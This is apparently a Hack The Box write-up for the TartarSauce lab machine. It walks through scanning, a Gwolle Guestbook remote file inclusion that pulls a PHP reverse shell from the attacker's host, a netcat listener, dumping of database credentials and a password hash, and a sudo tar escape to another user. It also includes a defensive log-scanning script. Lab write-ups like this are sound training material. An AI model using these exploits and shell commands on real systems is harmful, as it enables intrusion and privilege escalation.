TartarSauce-htb-writeup

0x00 Skills covered

Skills in this chapter: recognising rabbit holes, directory disclosure via robots.txt, directory scanning, WordPress plugin vulnerabilities, the Gwolle Guestbook plugin vulnerability, sudo -l, abusing /bin/tar, using pspy, script analysis and misconfiguration abuse

Reference: https://0xdf.gitlab.io/2018/10/20/htb-tartarsauce.html

Reference: https://thadigus.gitlab.io/htb-writeups/2022-02-17-Tartarsauce-HTB-Writeup/

0x01 Getting user access

1. Get the target IP address: 10.10.10.88

2. Scan for open ports:

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport1 10.10.10.88
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 22:38 CST
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.27s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 19.11 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sC -sV -p80 -Pn --min-rate=10000 -oG allport 10.10.10.88
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 22:39 CST
Nmap scan report for 10.10.10.88
Host is up (0.27s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-title: Landing Page
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.67 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn -sU --min-rate=10000 -oG allport2 10.10.10.88
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 22:40 CST
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.30s latency).
All 65535 scanned ports on 10.10.10.88 are in ignored states.
Not shown: 65467 open|filtered udp ports (no-response), 68 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 75.10 seconds

3. Look at the home page on port 80:

http://10.10.10.88/

4. Nothing of note there, so look at robots.txt:

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.88/robots.txt
User-agent: *
Disallow: /webservices/tar/tar/source/
Disallow: /webservices/monstra-3.0.4/
Disallow: /webservices/easy-file-uploader/
Disallow: /webservices/developmental/
Disallow: /webservices/phpmyadmin/

5. That gives a few leads; after trying each one, only a single path is actually reachable:

/webservices/monstra-3.0.4/

6. The footer in the bottom-right corner shows the CMS version, so use searchsploit to look for an exploit:

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit monstra 3.0.4
------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------- ---------------------------------
Monstra 3.0.4 - Stored Cross-Site Scripting (XSS) | php/webapps/51519.txt
Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upl | php/webapps/43348.txt
Monstra CMS 3.0.4 - Arbitrary Folder Deletion | php/webapps/44512.txt
Monstra CMS 3.0.4 - Authenticated Arbitrary File Uploa | php/webapps/48479.txt
Monstra cms 3.0.4 - Persitent Cross-Site Scripting | php/webapps/44502.txt
Monstra CMS 3.0.4 - Remote Code Execution (Authenticat | php/webapps/49949.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (1) | php/webapps/44855.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (2) | php/webapps/44646.txt
Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Accoun | php/webapps/45164.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/49949.py
Exploit: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49949
Path: /usr/share/exploitdb/exploits/php/webapps/49949.py
Codes: CVE-2018-6383
Verified: False
File Type: ASCII text, with very long lines (18247)
Copied to: /home/kali/桌面/49949.py

This script only works with an authenticated session, but

http://10.10.10.88/webservices/monstra-3.0.4/admin/

http://10.10.10.88/webservices/monstra-3.0.4/admin/index.php?id=pages

7. The vulnerabilities in this site cannot be used here, so it is probably a rabbit hole; abandon it and continue with directory scanning, this time against both the web root and the known directory:

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.88
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.88/_24-01-06_22-56-35.txt

Target: http://10.10.10.88/

[22:56:35] Starting:
[22:56:50] 403 - 300B - /.htaccess.bak1
[22:56:50] 403 - 302B - /.htaccess.sample
[22:56:50] 403 - 300B - /.htaccess.orig
[22:56:50] 403 - 300B - /.htaccess.save
[22:56:50] 403 - 300B - /.htaccess_orig
[22:56:50] 403 - 301B - /.htaccess_extra
[22:56:50] 403 - 298B - /.htaccess_sc
[22:56:50] 403 - 298B - /.htaccessBAK
[22:56:50] 403 - 298B - /.htaccessOLD
[22:56:50] 403 - 299B - /.htaccessOLD2
[22:56:50] 403 - 290B - /.htm
[22:56:50] 403 - 291B - /.html
[22:56:50] 403 - 297B - /.ht_wsr.txt
[22:56:50] 403 - 300B - /.htpasswd_test
[22:56:50] 403 - 297B - /.httr-oauth
[22:56:50] 403 - 296B - /.htpasswds
[22:56:54] 403 - 290B - /.php
[22:56:54] 403 - 291B - /.php3
[22:58:48] 200 - 128B - /robots.txt
[22:58:51] 403 - 299B - /server-status
[22:58:51] 403 - 300B - /server-status/

Task Completed



┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.88/webservices/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.88/_webservices__24-01-06_23-00-03.txt

Target: http://10.10.10.88/

[23:00:03] Starting: webservices/
[23:00:18] 403 - 309B - /webservices/.ht_wsr.txt
[23:00:19] 403 - 312B - /webservices/.htaccess.bak1
[23:00:19] 403 - 312B - /webservices/.htaccess.orig
[23:00:19] 403 - 314B - /webservices/.htaccess.sample
[23:00:19] 403 - 312B - /webservices/.htaccess.save
[23:00:19] 403 - 313B - /webservices/.htaccess_extra
[23:00:19] 403 - 312B - /webservices/.htaccess_orig
[23:00:19] 403 - 310B - /webservices/.htaccess_sc
[23:00:19] 403 - 310B - /webservices/.htaccessBAK
[23:00:19] 403 - 310B - /webservices/.htaccessOLD
[23:00:19] 403 - 311B - /webservices/.htaccessOLD2
[23:00:19] 403 - 302B - /webservices/.htm
[23:00:19] 403 - 303B - /webservices/.html
[23:00:19] 403 - 312B - /webservices/.htpasswd_test
[23:00:19] 403 - 309B - /webservices/.httr-oauth
[23:00:19] 403 - 308B - /webservices/.htpasswds
[23:00:23] 403 - 302B - /webservices/.php
[23:00:23] 403 - 303B - /webservices/.php3
[23:02:37] 301 - 319B - /webservices/wp -> http://10.10.10.88/webservices/wp/
[23:02:39] 200 - 1KB - /webservices/wp/wp-login.php
[23:02:39] 200 - 3KB - /webservices/wp/

Task Completed

8. This round of scanning found something new; try it:

http://10.10.10.88/webservices/wp/

9. The page source reveals a hostname; add it to the local hosts file:

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.88 tartarsauce.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.88 tartarsauce.htb

10. Since the target is WordPress, scan it with wpscan:

┌──(kali㉿kali)-[~/桌面]
└─$ wpscan --url http://10.10.10.88/webservices/wp/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.10.88/webservices/wp/ [10.10.10.88]
[+] Started: Sat Jan 6 23:06:17 2024

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.88/webservices/wp/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.10.88/webservices/wp/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.88/webservices/wp/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.10.88/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.10.88/webservices/wp/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:10 <=======================> (137 / 137) 100.00% Time: 00:00:10

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jan 6 23:06:38 2024
[+] Requests Done: 173
[+] Cached Requests: 4
[+] Data Sent: 46.379 KB
[+] Data Received: 12.671 MB
[+] Memory used: 228.215 MB
[+] Elapsed time: 00:00:20

11. This box is from 2018 and wpscan found no plugin issues, so I fell back on the walkthroughs linked above:

http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

=== Gwolle Guestbook ===
Contributors: Gwolle, mpol
Tags: guestbook, guest book, comments, feedback, antispam, review, gastenboek, livre d'or, Gästebuch, libro de visitas, livro de visitas
Requires at least: 3.7
Tested up to: 4.4
Stable tag: 2.3.10
License: GPLv2 or later

Gwolle Guestbook is the WordPress guestbook you've just been looking for. Beautiful and easy.


== Changelog ==

= 2.3.10 =
* 2018-2-12
* Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D

12. Search searchsploit for vulnerabilities in this version:

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Gwolle Guestbook v 1.5.3
------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------- ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion | php/webapps/38861.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/38861.txt
Exploit: WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
URL: https://www.exploit-db.com/exploits/38861
Path: /usr/share/exploitdb/exploits/php/webapps/38861.txt
Codes: CVE-2015-8351, OSVDB-129197
Verified: False
File Type: Unicode text, UTF-8 text, with very long lines (392)
Copied to: /home/kali/桌面/38861.txt

13. Try the approach from the exploit code:

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5/

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [06/Jan/2024 23:37:44] code 404, message File not found
10.10.10.88 - - [06/Jan/2024 23:37:44] "GET /wp-load.php HTTP/1.0" 404 -
10.10.10.88 - - [06/Jan/2024 23:37:55] code 404, message File not found
10.10.10.88 - - [06/Jan/2024 23:37:55] "GET /wp-load.php HTTP/1.0" 404 -

14. Our web server does receive a request, for /wp-load.php, so put a PHP reverse shell there under the name wp-load.php:

cat wp-load.php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.5'; // CHANGE THIS
$port = 443; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

15. Attempt the exploit:

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5/

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [06/Jan/2024 23:42:12] "GET /wp-load.php HTTP/1.0" 200 -

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.88] 37484
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
10:42:13 up 1:08, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
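Added example, not part of the write-up or of the plugin: the inclusion attempt in steps 13 to 15 leaves a line in the Apache access log whose abspath parameter carries a full URL. The script below scans combined-format log lines for any query parameter whose value is a URL, a PHP stream wrapper or a traversal sequence; the log lines are constructed from the requests shown above, with made-up timestamps and sizes.

```python
"""Flag file-inclusion attempts in Apache/nginx combined-format access logs."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined log format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A path-like parameter should never carry any of these.
WRAPPER_RE = re.compile(r'^(?:php|expect|phar|glob|file)://|^data:', re.I)
URL_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?//', re.I)   # http://host/, //host/
TRAVERSAL_RE = re.compile(r'(?:^|/)\.\.(?:/|$)|%2e%2e', re.I)

# Constructed sample log (based on the requests in the write-up; not a real log).
SAMPLE_LOG = [
    '10.10.14.5 - - [06/Jan/2024:23:37:44 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5/ HTTP/1.1" 200 0 "-" "curl/8.5.0"',
    '10.10.14.5 - - [06/Jan/2024:23:42:12 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http%3A%2F%2F10.10.14.5%2F HTTP/1.1" 200 0 "-" "curl/8.5.0"',
    '10.10.14.5 - - [06/Jan/2024:23:50:01 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=php://input HTTP/1.1" 500 0 "-" "-"',
    '10.10.14.5 - - [06/Jan/2024:23:51:09 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 300 "-" "-"',
    '192.168.1.20 - - [06/Jan/2024:23:52:30 +0000] "GET /webservices/wp/?p=1 HTTP/1.1" 200 3100 "-" "Mozilla/5.0"',
    '192.168.1.21 - - [06/Jan/2024:23:53:00 +0000] "GET /robots.txt HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one log line into its fields plus the decoded path and query params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = unquote(parts.path)
    # keep_blank_values so an empty `?abspath=` is still visible to the caller
    rec['params'] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify_value(value):
    """Return the kind of inclusion primitive a parameter value looks like, or None."""
    v = unquote(value).strip()          # catches double-encoded values too
    if WRAPPER_RE.match(v):
        return 'stream-wrapper'
    if URL_RE.match(v):
        return 'remote-url'
    if TRAVERSAL_RE.search(v):
        return 'traversal'
    return None


def find_inclusion_attempts(lines):
    """Return one finding per suspicious (request, parameter) pair, in log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec['params']:
            kind = classify_value(value)
            if kind:
                findings.append({
                    'ip': rec['ip'], 'ts': rec['ts'], 'path': rec['path'],
                    'param': name, 'value': unquote(value), 'kind': kind,
                    'status': int(rec['status']),
                })
    return findings


if __name__ == '__main__':
    for f in find_inclusion_attempts(SAMPLE_LOG):
        # A 200 on a remote-url hit means the include most likely succeeded.
        print(f"{f['ts']} {f['ip']} {f['kind']:<14} {f['path']} {f['param']}={f['value']} -> {f['status']}")
```

Hits on `ajaxresponse.php` with a URL-valued abspath and a 200 response are the page's exploitation as it appears to the server side.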

16. We now have an initial shell. I then dug through the site config, the database, everything I could find, but it turned out to be a rabbit hole. This box has no shortage of them!!!

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@TartarSauce:/$

www-data@TartarSauce:/$ pwd
pwd
/
www-data@TartarSauce:/$ cd /var/www
cd /var/www
www-data@TartarSauce:/var/www$ ls
ls
html
www-data@TartarSauce:/var/www$ cd html
cd html
www-data@TartarSauce:/var/www/html$ ls
ls
index.html robots.txt webservices
www-data@TartarSauce:/var/www/html$ cd webservices
cd webservices
www-data@TartarSauce:/var/www/html/webservices$ ls
ls
monstra-3.0.4 wp
www-data@TartarSauce:/var/www/html/webservices$ cd monstra-3.0.4
cd monstra-3.0.4
www-data@TartarSauce:/var/www/html/webservices/monstra-3.0.4$ ls
ls
CHANGELOG.md admin engine index_copy.php public sitemap.xml
LICENSE.md backups favicon.ico libraries robots.txt storage
README.md boot index.php plugins rss.php tmp
www-data@TartarSauce:/var/www/html/webservices/monstra-3.0.4$ cd admin
cd admin
www-data@TartarSauce:/var/www/html/webservices/monstra-3.0.4/admin$ ls
ls
index.php themes
www-data@TartarSauce:/var/www/html/webservices/monstra-3.0.4/admin$ cd ../../../
<ww/html/webservices/monstra-3.0.4/admin$ cd ../../../
www-data@TartarSauce:/var/www/html$ ls
ls
index.html robots.txt webservices
www-data@TartarSauce:/var/www/html$ cd webservices
cd webservices
www-data@TartarSauce:/var/www/html/webservices$ ls
ls
monstra-3.0.4 wp
www-data@TartarSauce:/var/www/html/webservices$ cd wp
cd wp
www-data@TartarSauce:/var/www/html/webservices/wp$ ls
ls
index.php wp-blog-header.php wp-cron.php wp-mail.php
license.txt wp-comments-post.php wp-includes wp-settings.php
readme.html wp-config-sample.php.bkp wp-links-opml.php wp-signup.php
wp-activate.php wp-config.php wp-load.php wp-trackback.php
wp-admin wp-content wp-login.php xmlrpc.php
www-data@TartarSauce:/var/www/html/webservices/wp$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp');

/** MySQL database username */
define('DB_USER', 'wpuser');

/** MySQL database password */
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'put your unique phrase here');
define('SECURE_AUTH_KEY', 'put your unique phrase here');
define('LOGGED_IN_KEY', 'put your unique phrase here');
define('NONCE_KEY', 'put your unique phrase here');
define('AUTH_SALT', 'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT', 'put your unique phrase here');
define('NONCE_SALT', 'put your unique phrase here');

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
define('WP_HOME', 'http://tartarsauce.htb/webservices/wp');
define('WP_SITEURL', 'http://tartarsauce.htb/webservices/wp');
/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
www-data@TartarSauce:/var/www/html/webservices/wp$

-----------------------------------------------------------

define('DB_NAME', 'wp');

/** MySQL database username */
define('DB_USER', 'wpuser');

/** MySQL database password */
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');

mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'show tables'

mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'describe wp_users'

mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'select user_login,user_pass from wp_users'


www-data@TartarSauce:/var/www/html/webservices/wp$ ls -la /home
ls -la /home
total 12
drwxr-xr-x 3 root root 4096 May 12 2022 .
drwxr-xr-x 22 root root 4096 May 12 2022 ..
drwxrw---- 5 onuma onuma 4096 May 12 2022 onuma
www-data@TartarSauce:/var/www/html/webservices/wp$

www-data@TartarSauce:/var/www/html/webservices/wp$ mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'show tables'
<sql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'show tables'
mysql: [Warning] Using a password on the command line interface can be insecure.
+-----------------------+
| Tables_in_wp |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_gwolle_gb_entries |
| wp_gwolle_gb_log |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
www-data@TartarSauce:/var/www/html/webservices/wp$ mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'describe wp_users'
<='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'describe wp_users'
mysql: [Warning] Using a password on the command line interface can be insecure.
+---------------------+---------------------+------+-----+---------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------------------+---------------------+------+-----+---------------------+----------------+
| ID | bigint(20) unsigned | NO | PRI | NULL | auto_increment |
| user_login | varchar(60) | NO | MUL | | |
| user_pass | varchar(255) | NO | | | |
| user_nicename | varchar(50) | NO | MUL | | |
| user_email | varchar(100) | NO | MUL | | |
| user_url | varchar(100) | NO | | | |
| user_registered | datetime | NO | | 0000-00-00 00:00:00 | |
| user_activation_key | varchar(255) | NO | | | |
| user_status | int(11) | NO | | 0 | |
| display_name | varchar(250) | NO | | | |
+---------------------+---------------------+------+-----+---------------------+----------------+
www-data@TartarSauce:/var/www/html/webservices/wp$ mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'select user_login,user_pass from wp_users'
< -D wp -e 'select user_login,user_pass from wp_users'
mysql: [Warning] Using a password on the command line interface can be insecure.
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| wpadmin | $P$BBU0yjydBz9THONExe2kPEsvtjStGe1 |
+------------+------------------------------------+
www-data@TartarSauce:/var/www/html/webservices/wp$

17. Let's look at what is under /home:

www-data@TartarSauce:/var/www/html/webservices/wp$ ls -la /home
ls -la /home
total 12
drwxr-xr-x 3 root root 4096 May 12 2022 .
drwxr-xr-x 22 root root 4096 May 12 2022 ..
drwxrw---- 5 onuma onuma 4096 May 12 2022 onuma
www-data@TartarSauce:/var/www/html/webservices/wp$

www-data@TartarSauce:/var/www/html/webservices/wp$ ls -la /home/onuma
ls -la /home/onuma
ls: cannot open directory '/home/onuma': Permission denied
www-data@TartarSauce:/var/www/html/webservices/wp$

18. Then try sudo -l:

www-data@TartarSauce:/var/www/html/webservices/wp$ sudo -l
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
www-data@TartarSauce:/var/www/html/webservices/wp$

19. That is exploitable: using the tar technique from GTFOBins, we get a shell as that user directly:

www-data@TartarSauce:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
<ll /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: Removing leading `/' from member names
onuma@TartarSauce:/$ id
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

20. Get the user flag:

onuma@TartarSauce:/$ cd ~
cd ~
onuma@TartarSauce:~$ ls
ls
shadow_bkp user.txt
onuma@TartarSauce:~$ cat user.txt
cat user.txt
09368066008f72bebba5bac1ec692982
onuma@TartarSauce:~$

0x02 Getting root

21. Enumerating the usual places turned up nothing suspicious, so upload pspy from the attacking machine and see what else is running:

┌──(kali㉿kali)-[~/桌面/htb-tools/pspy]
└─$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.10.88 - - [07/Jan/2024 00:06:01] "GET /pspy64 HTTP/1.1" 200 -

onuma@TartarSauce:~$ wget http://10.10.14.5:8080/pspy32
wget http://10.10.14.5:8080/pspy32
--2024-01-06 11:06:01-- http://10.10.14.5:8080/pspy32
Connecting to 10.10.14.5:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy32'

pspy64 100%[===================>] 2.96M 1.18MB/s in 2.5s

2024-01-06 11:06:04 (1.18 MB/s) - 'pspy32' saved [3104768/3104768]

onuma@TartarSauce:~$

22. Run it:

onuma@TartarSauce:~$ chmod +x pspy32
chmod +x pspy32
onuma@TartarSauce:~$ ./pspy32
./pspy32
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/01/06 11:08:54 CMD: UID=1000 PID=4184 | ./pspy32
2024/01/06 11:08:54 CMD: UID=1000 PID=4030 | /bin/bash
2024/01/06 11:08:54 CMD: UID=1000 PID=4029 | tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
